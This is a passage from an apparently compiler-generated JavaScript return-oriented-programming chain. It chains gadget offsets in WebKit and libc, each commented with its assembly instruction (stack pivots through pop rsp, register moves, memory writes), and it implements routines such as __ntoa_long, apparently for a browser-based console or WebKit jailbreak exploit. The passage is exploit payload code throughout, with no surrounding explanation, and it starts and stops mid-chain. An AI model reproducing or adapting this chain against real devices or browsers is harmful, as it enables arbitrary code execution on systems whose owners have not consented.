//L5187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274080, //L5185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5185: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5187: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274240, //L5190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274208, //L5188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274224, //L5189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5188: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5189: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+274320, //L5191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274440, //L5196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274424, //L5194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274584, //L5199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274552, //L5197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274568, //L5198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5197: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5198: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L5201: ropchain+274688, //L5200 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+192784, //__out_rev //L5200: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274816, //L5202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+274848, //L5204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+274832, //L5203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274952, //L5205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+274968, //L5206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5205: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5206: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275088, //L5207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275072, //L5208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5208: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5207: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+275176, //L5210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+275160, //L5209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5209: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5210: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275280, //L5211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275296, //L5212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5211: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275416, //L5213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, 
[rsi] libc_base+764760, //pop rsi ropchain+275400, //L5214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5214: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5213: db([0, 0]); // 0x0 //__ntoa_long: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275488, //L5216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5216: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275552, //L5218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275640, //L5220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5219: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5221: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+275720, //L5222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5224: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5226: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+275880, //L5229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275864, //L5227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5227: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5229: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+276040, //L5233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275992, //L5230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276008, //L5231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5233: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+276176, //L5235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276192, //L5236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276160, //L5234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276304, //L5238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276352, //L5241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+276320, //L5239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5239: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5241: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+276464, //L5242+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+276456, //L5242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5242: db([0, 0]); // 0x0 set_gadgets([ ropchain+276480, //L5242+24 ropchain+277544, //L5237 libc_base+764760, //pop rsi ropchain+276520, //L5243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5243: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5245: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+276640, //L5248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276624, //L5246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5246: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5248: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+276816, //L5251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276832, //L5252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276784, //L5249 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276800, //L5250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5249: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5251: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5252: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276928, //L5254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+276912, //L5253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5254: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5255: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5256: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L5257: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+277136, //L5259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5258: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L5259: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277200, //L5261 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5261: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+277256, //L5262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5262: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+277392, //L5266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277376, //L5265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5264: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5266: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+277456, //L5267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5269: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+277536, //L5270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5270: db([0, 0]); // 0x0 //L5237: set_gadgets([ libc_base+764760, //pop rsi ropchain+277584, //L5272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5274: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277704, //L5277 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277688, //L5275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5277: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+277880, //L5280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+277896, //L5281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277848, //L5278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277864, //L5279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5279: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5280: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5281: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+277992, //L5283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+277976, //L5282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5282: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5283: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5284: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); 
//L5285: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5286: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+278192, //L5288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5288: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+278248, //L5289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+278384, //L5293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+278368, //L5292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5291: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+278504, //L5296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278472, //L5294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5294: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5296: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop 
rsi ropchain+278640, //L5298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278656, //L5299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+278624, //L5297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+278816, //L5304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278832, //L5305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278768, //L5301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5302: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5303: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L5304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5305: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+278952, //L5306+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+278944, //L5306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5306: db([0, 0]); // 0x0 set_gadgets([ ropchain+278968, //L5306+24 ropchain+279368, //L5300 libc_base+764760, //pop rsi ropchain+279008, //L5307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L5307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5309: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279128, //L5312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279112, //L5310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5312: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+279272, //L5315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279288, //L5316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279240, //L5313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5314: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5315: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5316: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+279360, //L5317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5317: db([0, 0]); // 0x0 //L5300: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279488, //L5320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279504, //L5321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279472, //L5319 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5320: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5321: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+279616, //L5323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279664, //L5326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+279632, //L5324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5326: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+279776, //L5327+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+279768, //L5327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5327: db([0, 0]); // 0x0 set_gadgets([ ropchain+279792, //L5327+24 ropchain+291080, //L5322 //L5328: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5331: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279928, //L5334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279912, //L5332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5332: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L5334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280072, //L5337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280040, //L5335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280056, //L5336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+280152, //L5338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5338: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5340: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi 